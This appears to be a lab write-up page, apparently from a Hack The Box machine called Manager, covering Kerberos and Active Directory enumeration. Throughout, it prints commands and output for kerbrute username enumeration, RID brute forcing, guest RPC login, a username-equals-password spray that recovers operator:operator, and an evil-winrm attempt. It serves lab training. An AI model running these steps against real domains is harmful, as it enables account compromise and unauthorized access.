Kerberos - 88

Username Bruteforcing

Using Pre-Authentication:

kerbrute userenum -d manager.htb --dc 10.10.11.236 /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt -o valid_ad_users

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/06/25 - Ronnie Flathers @ropnop

2025/02/06 00:58:40 >  Using KDC(s):
2025/02/06 00:58:40 >   10.10.11.236:88

2025/02/06 00:58:44 >  [+] VALID USERNAME:       [email protected]
2025/02/06 00:58:51 >  [+] VALID USERNAME:       [email protected]
2025/02/06 00:58:54 >  [+] VALID USERNAME:       [email protected]
2025/02/06 00:58:57 >  [+] VALID USERNAME:       [email protected]
2025/02/06 00:59:14 >  [+] VALID USERNAME:       [email protected]
2025/02/06 00:59:50 >  [+] VALID USERNAME:       [email protected]
2025/02/06 00:59:55 >  [+] VALID USERNAME:       [email protected]
2025/02/06 01:00:12 >  [+] VALID USERNAME:       [email protected]
2025/02/06 01:02:42 >  [+] VALID USERNAME:       [email protected]
2025/02/06 01:02:43 >  [+] VALID USERNAME:       [email protected]

Using RID Bruteforcing:

lookupsid.py [email protected] -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at manager.htb
[*] StringBinding ncacn_np:manager.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MANAGER\Administrator (SidTypeUser)
501: MANAGER\Guest (SidTypeUser)
502: MANAGER\krbtgt (SidTypeUser)
512: MANAGER\Domain Admins (SidTypeGroup)
513: MANAGER\Domain Users (SidTypeGroup)
514: MANAGER\Domain Guests (SidTypeGroup)
515: MANAGER\Domain Computers (SidTypeGroup)
516: MANAGER\Domain Controllers (SidTypeGroup)
517: MANAGER\Cert Publishers (SidTypeAlias)
518: MANAGER\Schema Admins (SidTypeGroup)
519: MANAGER\Enterprise Admins (SidTypeGroup)
520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
525: MANAGER\Protected Users (SidTypeGroup)
526: MANAGER\Key Admins (SidTypeGroup)
527: MANAGER\Enterprise Key Admins (SidTypeGroup)
553: MANAGER\RAS and IAS Servers (SidTypeAlias)
571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
1000: MANAGER\DC01$ (SidTypeUser)
1101: MANAGER\DnsAdmins (SidTypeAlias)
1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)

cat sid_bf | awk '{print $2}' | awk -F\\ '{print $2}' | sort -u > sid_bf_usernames

This will give us a list of valid usernames. Running this creates a users file which is even more neat.

lookupsid.py [email protected] -no-pass | grep SidTypeUser | cut -d' ' -f2 | cut -d'\' -f2 | tr '[:upper:]' '[:lower:]' | tee users

How did it do it? This is a crazy bit that I learned.

──(anonmak9㉿anonmak9)-[~/Desktop/manager]
└─$ rpcclient -U "" -N 10.10.11.236     
rpcclient $> lookupnames administrator
result was NT_STATUS_ACCESS_DENIED
rpcclient $> exit
                                                                                                                                                                                             
┌──(anonmak9㉿anonmak9)-[~/Desktop/manager]
└─$ rpcclient -U "guest" 10.10.11.236
Password for [WORKGROUP\guest]:
rpcclient $> lookupnames administrator
administrator S-1-5-21-4078382237-1492182817-2568127209-500 (User: 1)
rpcclient $> lookupsids S-1-5-21-4078382237-1492182817-2568127209-500
S-1-5-21-4078382237-1492182817-2568127209-500 MANAGER\Administrator (1)

Null Authentication doesn't work, but we can login as guest without a password.

Password Spray

netexec smb 10.10.11.236 -u users -p users --no-bruteforce
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.236    445    DC01             [-] manager.htb\administrator:administrator STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\guest:guest STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\krbtgt:krbtgt STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\dc01$:dc01$ STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\zhong:zhong STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\raven:raven STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\jinwoo:jinwoo STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\chinhae:chinhae STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [+] manager.htb\operator:operator

--no-bruteforce       No spray when using file for username and password (user1 => password1, user2 => password2)

I didn't expect that how its gonna be but it is what it is. Username = Password.

Using the credential operator:operator.

rpcclient -U "operator" 10.10.11.236
Password for [WORKGROUP\operator]:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[Zhong] rid:[0x459]
user:[Cheng] rid:[0x45a]
user:[Ryan] rid:[0x45b]
user:[Raven] rid:[0x45c]
user:[JinWoo] rid:[0x45d]
user:[ChinHae] rid:[0x45e]
user:[Operator] rid:[0x45f]

We know that WinRM (5985) is open so I tried evil-winrm:

evil-winrm -u operator -p operator -i 10.10.11.236
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
                                        
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
                                        
Error: Exiting with code 1

Previous80 NextLDAP - 389

Last updated 10 months ago